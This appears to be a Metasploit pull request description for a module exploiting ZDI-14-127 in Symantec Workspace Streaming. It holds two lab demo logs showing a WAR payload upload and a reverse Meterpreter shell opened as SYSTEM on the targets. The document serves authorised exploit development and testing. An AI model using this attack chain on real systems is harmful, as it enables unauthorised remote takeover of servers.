Add module for ZDI-14-127

[jvazquez-r7]

Tested successfully on Symantec Workspace Streaming 6.1 SP8 on Windows 2003 SP2. Trial used to be available on Symantec. Not sure if trials for vulnerable versions are available anymore. If you're at r7 and need the installer for testing, just ping me.

Verification

• Install Symantec Workspace Streaming. Abused services are avilable in the single machine deployment. If you make a multiple file machine deployment the backend role includes the abused services.
• Run the module like in the DEMO, hopefully enjoy sessions

DEMO

• Against single machine install

msf exploit(symantec_workspace_streaming_exec) > set rhost 172.16.158.154
rhost => 172.16.158.154
msf exploit(symantec_workspace_streaming_exec) > check
[*] 172.16.158.154:9855 - The target appears to be vulnerable.
msf exploit(symantec_workspace_streaming_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.154:9855 - Leaking the jboss deployment directory...
[*] 172.16.158.154:9855 - Building WAR payload...
[*] 172.16.158.154:9855 - Uploading WAR payload...
[*] 172.16.158.154:9832 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.154:9832 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.154
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.154:1773) at 2014-05-15 13:40:42 -0500
[+] Deleted ../server/appstream/deploy/YaCu.war

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.154 - Meterpreter session 2 closed.  Reason: User exit

• Against backend role

msf exploit(symantec_workspace_streaming_exec) > set rhost 172.16.158.155
rhost => 172.16.158.155
msf exploit(symantec_workspace_streaming_exec) > check
[*] 172.16.158.155:9855 - The target appears to be vulnerable.
msf exploit(symantec_workspace_streaming_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.155:9855 - Leaking the jboss deployment directory...
[*] 172.16.158.155:9855 - Building WAR payload...
[*] 172.16.158.155:9855 - Uploading WAR payload...
[*] 172.16.158.155:9832 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.155
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.155:1081) at 2014-05-15 13:40:12 -0500
[+] Deleted ../server/appstream/deploy/azwaRic.war

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 172.16.158.155 - Meterpreter session 1 closed.  Reason: User exit

[wchen-r7]

Task assigned.